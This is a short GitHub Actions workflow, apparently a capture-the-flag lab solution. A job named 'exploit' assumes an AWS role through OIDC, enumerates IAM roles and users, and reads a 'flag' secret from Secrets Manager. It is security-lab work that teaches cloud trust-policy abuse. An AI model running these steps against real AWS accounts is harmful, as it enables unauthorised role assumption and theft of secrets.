name: AWS OIDC Lab

on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::276821357134:role/sts-lab-2-target
          aws-region: us-east-1
      - name: Enumerate allowed actions (quick test)
        run: |
          aws iam list-roles || true
          aws iam list-users || true
          aws sts get-caller-identity
      - name: Read the flag
        run: |
          aws secretsmanager get-secret-value --secret-id flag
